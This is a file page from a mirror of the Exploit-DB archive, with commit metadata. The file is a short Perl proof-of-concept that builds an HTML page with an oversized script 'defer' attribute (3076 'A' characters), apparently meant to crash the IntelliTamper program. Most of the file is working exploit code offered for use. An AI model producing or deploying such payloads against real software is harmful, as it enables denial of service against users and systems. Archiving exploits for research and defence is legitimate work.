exploit-db-mirror/exploits/windows/dos/11217.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

10 lines
No EOL
352 B
Text

# H0m3 : S3curity-art.com & Google.com
# M4!L : Wizard-skh@hotmail.com<mailto:Wizard-skh@hotmail.com> & My@hotmail.it<mailto:My@hotmail.it>
# usage : perl xpl.pl >>xpl.html
my $IntelliTamper_html ='<html><head><title>SkuLL-HackeR Home
World</title></head><body>' .
'<script defer="' .
"\x41" x 3076 .
'">' .
"</body></html>";
print $IntelliTamper_html;